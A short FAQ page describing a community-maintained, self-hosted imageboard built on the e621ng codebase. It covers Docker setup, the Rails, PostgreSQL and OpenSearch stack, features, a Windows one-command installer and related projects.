What is this? This is an independent, community-maintained self-hosted imageboard platform built on the open-source e621ng codebase, letting you run your own instance with tagging, search, and user accounts.
Is this a hosted service or something I run myself? It is a self-hosted application: you deploy it on your own server or machine using Docker, not a hosted SaaS.
How do I get it running?Clone the repo, enter the directory, copy the environment configuration, run the setup script, then start the containers; Windows also has a one-command CMD installer.
Do I need Docker and Docker Compose before I start?Yes — Docker, Docker Compose, Git, and several GB of disk space and RAM are needed; on Windows, Docker Desktop already bundles Compose.
What tech stack powers it?A Ruby on Rails backend with a PostgreSQL database, OpenSearch for search, and JavaScript on the frontend, all wired together in Docker containers.
What features come built in?Advanced search, a tagging system, user accounts, comments, favorites, post management, and moderation tools ship out of the box.
Is there an easier install option besides manual Docker setup?Yes, there is a one-command CMD installer for Windows that automatically downloads and installs the required components.
What are similar projects?discourse, forem, directus, InsForge, flowsint, sure, clevis, parse-server
